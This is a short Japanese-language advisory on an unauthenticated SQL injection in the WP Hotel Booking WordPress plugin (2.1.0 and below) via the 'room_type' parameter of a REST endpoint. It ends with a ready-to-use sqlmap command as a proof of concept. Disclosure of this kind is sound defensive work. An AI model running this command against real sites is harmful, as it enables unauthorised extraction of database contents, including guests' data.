
WP Hotel Booking <= 2.1.0 - 認証なしSQLインジェクション
WP Hotel Booking <= 2.1.0 - 未認証のSQLインジェクション
WordPress用プラグインWP Hotel Bookingは、バージョン2.1.0以下において、/wphb/v1/rooms/search-rooms REST APIエンドポイントの'room_type'パラメータを介したSQLインジェクションに対して脆弱です。これは、ユーザー提供のパラメータに対するエスケープ処理の不備と、既存のSQLクエリに対する準備の不足に起因します。その結果、認証されていない攻撃者が既存のクエリに追加のSQLクエリを付加し、データベースから機密情報を抽出することが可能になります。
sqlmap -u 'https://www.target.com/wp-json/wphb/v1/rooms/search-rooms?check_in_date=2025-01-01&check_out_date=2025-01-10&adults=4&max_child=0&paged=1&room_type=standard' --dbms='MySQL ' --random-agent